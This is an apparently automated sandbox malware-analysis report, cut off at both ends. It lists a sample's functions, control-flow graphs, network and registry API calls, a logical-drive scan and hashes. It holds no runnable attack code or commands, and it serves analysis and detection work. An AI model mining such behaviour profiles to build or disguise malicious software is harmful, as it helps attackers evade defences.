568dc8-568dd9 call 56b100 1469->1474 1475 568c99-568c9f 1469->1475 1470->1463 1471->1463 1471->1470 1474->1437 1475->1424 1482 568c64-568c68 1478->1482 1483 568c6a-568c70 1478->1483 1481->1409 1487 568d7a-568d81 1481->1487 1482->1469 1482->1483 1483->1469 1484 568c72-568c8b call 5750a0 1483->1484 1484->1469 1487->1409 1491 568d87-568d8f 1487->1491 1495 568d91-568d95 1491->1495 1496 568d9b-568da1 1491->1496 1495->1409 1495->1496 1496->1409 1497 568da7 1496->1497 1497->1464
                                                  APIs
                                                  • connect.WS2_32(?,?,00000001), ref: 00568C30
                                                  • SleepEx.KERNELBASE(00000000,00000000), ref: 00568CF3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: Sleepconnect
                                                  • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                  • API String ID: 238548546-879669977
                                                  • Opcode ID: a8749c86145bc05ab4e51a3f78d4800fd80192fe50a5fba871dc635257e6455d
                                                  • Instruction ID: bb001210a2cfa93e1b359172e74ea95a5669f188e61c2d81258353cbef82c1ee
                                                  • Opcode Fuzzy Hash: a8749c86145bc05ab4e51a3f78d4800fd80192fe50a5fba871dc635257e6455d
                                                  • Instruction Fuzzy Hash: C5B1B270604706AFEB20CF24C989BB67FE4BF45318F148A28E8595B2E2DB71EC54C761
                                                  Function 00532F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1498 532f17-532f8c call 9b34f0 call 9b38e0 1503 5331c9-5331cd 1498->1503 1504 5331d3-5331d6 1503->1504 1505 532f91-532ff4 call 531619 RegOpenKeyExA 1503->1505 1508 5331c5 1505->1508 1509 532ffa-53300b 1505->1509 1508->1503 1510 53315c-5331ac RegEnumKeyExA 1509->1510 1511 5331b2-5331c2 RegCloseKey 1510->1511 1512 533010-533083 call 531619 RegOpenKeyExA 1510->1512 1511->1508 1515 533089-5330d4 RegQueryValueExA 1512->1515 1516 53314e-533152 1512->1516 1517 5330d6-533137 call 9b37c0 call 9b3850 call 9b38e0 call 9b36f0 call 9b38e0 call 9b1c60 1515->1517 1518 53313b-53314b RegCloseKey 1515->1518 1516->1510 1517->1518 1518->1516
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: CloseEnumOpen
                                                  • String ID: d
                                                  • API String ID: 1332880857-2564639436
                                                  • Opcode ID: dfca4f7c9938c4bb5e3c481e364f5d99bda4a24627fcb2d547d99fccc58868a2
                                                  • Instruction ID: 53cd78a54d9b218a540896876c12da1f8c17b2ae3059275715bc08a3efa0e331
                                                  • Opcode Fuzzy Hash: dfca4f7c9938c4bb5e3c481e364f5d99bda4a24627fcb2d547d99fccc58868a2
                                                  • Instruction Fuzzy Hash: 887194B49047199FDB10EF69C98579EBBF0BF84318F10C85DE89897311E7749A888F92
                                                  Function 005376A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1531 5376a0-5376be 1532 5376c0-5376c7 1531->1532 1533 5376e6-5376f2 send 1531->1533 1532->1533 1534 5376c9-5376d1 1532->1534 1535 5376f4-537709 call 5372a0 1533->1535 1536 53775e-537762 1533->1536 1538 5376d3-5376e4 1534->1538 1539 53770b-537759 call 5372a0 call 53cb20 call 8b8c50 1534->1539 1535->1536 1538->1535 1539->1536
                                                  APIs
                                                  • send.WS2_32(multi.c,?,?,?,N=S,00000000,?,?,005407BF), ref: 005376EB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: send
                                                  • String ID: LIMIT %s:%d %s reached memlimit$N=S$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                  • API String ID: 2809346765-3401056187
                                                  • Opcode ID: 1d803c1bbe4af6ddc8313734e4c7639f2a12f0ba681c901ae8643645a42011c4
                                                  • Instruction ID: 1cf329e143ba0ef60576f095c17dea2953dbe3f326868ad8faadcd9e9d9635ea
                                                  • Opcode Fuzzy Hash: 1d803c1bbe4af6ddc8313734e4c7639f2a12f0ba681c901ae8643645a42011c4
                                                  • Instruction Fuzzy Hash: 0911E7F5A193487BE120AB19AD9AD277FACFFC5B68F554D09F80813251E5619C0086B2
                                                  Function 00569290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1650 569290-5692ed call 5376a0 1653 5693c3-5693ce 1650->1653 1654 5692f3-5692fb 1650->1654 1663 5693e5-569427 call 54d090 call 574f40 1653->1663 1664 5693d0-5693e1 1653->1664 1655 569301-569333 call 54d8c0 call 54d9a0 1654->1655 1656 5693aa-5693af 1654->1656 1675 5693a7 1655->1675 1676 569335-569364 WSAIoctl 1655->1676 1657 569456-569470 1656->1657 1658 5693b5-5693bc 1656->1658 1661 5693be 1658->1661 1662 569429-569431 1658->1662 1661->1657 1669 569433-569437 1662->1669 1670 569439-56943f 1662->1670 1663->1657 1663->1662 1664->1658 1666 5693e3 1664->1666 1666->1657 1669->1657 1669->1670 1670->1657 1671 569441-569453 call 5750a0 1670->1671 1671->1657 1675->1656 1679 569366-56936f 1676->1679 1680 56939b-5693a4 1676->1680 1679->1680 1682 569371-569390 setsockopt 1679->1682 1680->1675 1682->1680 1683 569392-569395 1682->1683 1683->1680
                                                  APIs
                                                  • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0056935D
                                                  • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00569389
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: Ioctlsetsockopt
                                                  • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                  • API String ID: 1903391676-2691795271
                                                  • Opcode ID: b3f184b6358ee6387ea572b828ada898acfdc67098305e3c1fc8d70cfcf12a3f
                                                  • Instruction ID: d1d4194a52f1dfe29db710a5a43e241d663800395d73d244083b07762b290569
                                                  • Opcode Fuzzy Hash: b3f184b6358ee6387ea572b828ada898acfdc67098305e3c1fc8d70cfcf12a3f
                                                  • Instruction Fuzzy Hash: 16510770600306ABDB11DF24C885FAABBA9FF88314F148528FD488B382EB71E951CB51
                                                  Function 00537770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1684 537770-53778e 1685 537790-537797 1684->1685 1686 5377b6-5377c2 recv 1684->1686 1685->1686 1687 537799-5377a1 1685->1687 1688 5377c4-5377d9 call 5372a0 1686->1688 1689 53782e-537832 1686->1689 1691 5377a3-5377b4 1687->1691 1692 5377db-537829 call 5372a0 call 53cb20 call 8b8c50 1687->1692 1688->1689 1691->1688 1692->1689
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: recv
                                                  • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                  • API String ID: 1507349165-640788491
                                                  • Opcode ID: c70eeceba9f4d061a5a82d255dca79537ae44d59329134611bca5c3f793252d6
                                                  • Instruction ID: a7f73dedacdbf6028699d663ebae8624084552f746ad7fe7b818ac07dd6e7d1a
                                                  • Opcode Fuzzy Hash: c70eeceba9f4d061a5a82d255dca79537ae44d59329134611bca5c3f793252d6
                                                  • Instruction Fuzzy Hash: 4511E7F5E093487BE130AB159D5AE27BFACFFC9B68F454D19F80853352E5619C0086B2
                                                  Function 005375E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1703 5375e0-5375ed 1704 537607-537629 socket 1703->1704 1705 5375ef-5375f6 1703->1705 1707 53762b-53763c call 5372a0 1704->1707 1708 53763f-537642 1704->1708 1705->1704 1706 5375f8-5375ff 1705->1706 1709 537643-537699 call 5372a0 call 53cb20 call 8b8c50 1706->1709 1710 537601-537602 1706->1710 1707->1708 1710->1704
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: socket
                                                  • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                  • API String ID: 98920635-842387772
                                                  • Opcode ID: 8afc3fe1c31d3a5923fe377abdd202d8a906d23c8d3e5295f7f58c09b4194ba7
                                                  • Instruction ID: 43e80f17302803ce42daefc604f80027f68f69382a811da84b70de47f090934c
                                                  • Opcode Fuzzy Hash: 8afc3fe1c31d3a5923fe377abdd202d8a906d23c8d3e5295f7f58c09b4194ba7
                                                  • Instruction Fuzzy Hash: E9114CB1A0525177E6202B6DAC67E8B7FA8FFC5764F458D15F404932A2D611D890C3E2
                                                  Function 0725007E Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 356COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1721 725007e-7250121 call 725011d 1731 7250123-7250127 1721->1731 1732 725017c-7250345 GetLogicalDrives 1721->1732 1734 725012d-725012f 1731->1734 1735 7250128 call 725013b 1731->1735 1756 7250355-72505be call 72504bb 1732->1756 1736 7250136-7250139 1734->1736 1737 7250131-7250135 1734->1737 1735->1734 1737->1736
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: A:\$A:\
                                                  • API String ID: 0-1047444362
                                                  • Opcode ID: 7a737f03eefd77d9cc382e73b76ed00868a6c055214e1fd62c6d72be04c97e27
                                                  • Instruction ID: 77e3c6fb8686dad9d9eaf2d3a0425cb88783a8b05a6a23ec59668c8481933fce
                                                  • Opcode Fuzzy Hash: 7a737f03eefd77d9cc382e73b76ed00868a6c055214e1fd62c6d72be04c97e27
                                                  • Instruction Fuzzy Hash: F8718BEB13C221BE722285B62F54AFA6B6DE5C7730B30C426FC07D6602E2F44E495172
                                                  Function 0725015D Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 344COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1787 725015d-725015e 1788 7250160-725017b 1787->1788 1789 72500fd-7250121 call 725011d 1787->1789 1796 725017c-7250345 GetLogicalDrives 1788->1796 1795 7250123-7250127 1789->1795 1789->1796 1798 725012d-725012f 1795->1798 1799 7250128 call 725013b 1795->1799 1820 7250355-72505be call 72504bb 1796->1820 1800 7250136-7250139 1798->1800 1801 7250131-7250135 1798->1801 1799->1798 1801->1800
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  • Opcode ID: b7b172e7b2abf97eba51de97063263efa69018780a9f8e83040496b35da0d736
                                                  • Instruction ID: 2dcda355effb354e20e178695e04414493c0a60aafdfb579c91bd3d1922dbb4a
                                                  • Opcode Fuzzy Hash: b7b172e7b2abf97eba51de97063263efa69018780a9f8e83040496b35da0d736
                                                  • Instruction Fuzzy Hash: C4618FEB13C221BE722285A62F54AFA6B6DE5C7730B30C466FC07D6602E2F44E4D5172
                                                  Function 07250145 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 324COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1851 7250145-7250345 GetLogicalDrives 1877 7250355-72505be call 72504bb 1851->1877
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  • Opcode ID: cbe7b0529818517de6f88a057ec32680680f4eaa42386fe216a80bd841b6e8f1
                                                  • Instruction ID: 0f4f0a8d9ce3e5e336b6c56ad8a417009f6f368f1fbdb6ca708ccab6422f54e1
                                                  • Opcode Fuzzy Hash: cbe7b0529818517de6f88a057ec32680680f4eaa42386fe216a80bd841b6e8f1
                                                  • Instruction Fuzzy Hash: 64516EEB53C221BE722285A62F54AFB6B6DE5C7730B30C426FC07D6546E2F44E491172
                                                  Function 0725018D Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 324COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1908 725018d-725018e 1909 7250190-7250192 1908->1909 1910 725014e-7250185 1908->1910 1911 7250193-7250345 GetLogicalDrives 1909->1911 1910->1911 1935 7250355-72505be call 72504bb 1911->1935
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: A:\$A:\
                                                  • API String ID: 0-1047444362
                                                  • Opcode ID: fa5c7044e67aa52b20ad7aece7bd622cb533e9c9e4a268211b13d95460bb0937
                                                  • Instruction ID: 3f32eba169a4898733d71f29936339af4696d74ac9df96927089b3021f042a10
                                                  • Opcode Fuzzy Hash: fa5c7044e67aa52b20ad7aece7bd622cb533e9c9e4a268211b13d95460bb0937
                                                  • Instruction Fuzzy Hash: E6516EEB53C221BE722285A62F54AFB5B6DE5C7730B30C426FC07D6542E2F44E495172
                                                  Function 0725013B Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 321COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  • Opcode ID: 99e6afda9313f41ebf62d013653f9b2fc86f6b2f9f61849bdcf5b6ac6297bb08
                                                  • Instruction ID: 1129acee6f6af421b84da191b633b281395f33a0e405c48671fb573c3b758465
                                                  • Opcode Fuzzy Hash: 99e6afda9313f41ebf62d013653f9b2fc86f6b2f9f61849bdcf5b6ac6297bb08
                                                  • Instruction Fuzzy Hash: 06515EEB13C221BE726285A62F54AFB5B6DE5C7730B30C426FC07D6642E2F44E496172
                                                  Function 072500CA Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 314COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: A:\$A:\
                                                  • API String ID: 0-1047444362
                                                  • Opcode ID: 53e27528f9c1edf9e548f324c91ac4a623617b015ab5eb459da4d6de90cf4f4b
                                                  • Instruction ID: ae8309fcf2d3968ae1a8e4c3c44f711eb21314ca5e6f2c845d28ecfd6d7fd523
                                                  • Opcode Fuzzy Hash: 53e27528f9c1edf9e548f324c91ac4a623617b015ab5eb459da4d6de90cf4f4b
                                                  • Instruction Fuzzy Hash: 63518DEB13C221BE722285A62F54AFA6B6DE5C7730B30C466FC07D6502E2F44E4D6172
                                                  Function 0725016E Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLogicalDrives.KERNELBASE(?,07240C53), ref: 07250340
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633385731.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7250000_file.jbxd
                                                  Similarity
                                                  • API ID: DrivesLogical
                                                  • String ID: A:\$A:\
                                                  • API String ID: 999431828-1047444362
                                                  • Opcode ID: 66b35416cbbef488e20661e6c8310806df46ec563337d45721a82c82ce395fc4
                                                  • Instruction ID: 81702a35e5b050b5201b2f92f0a8561e86e0c3fe9f61c6e4aba5605bbc5c1f90
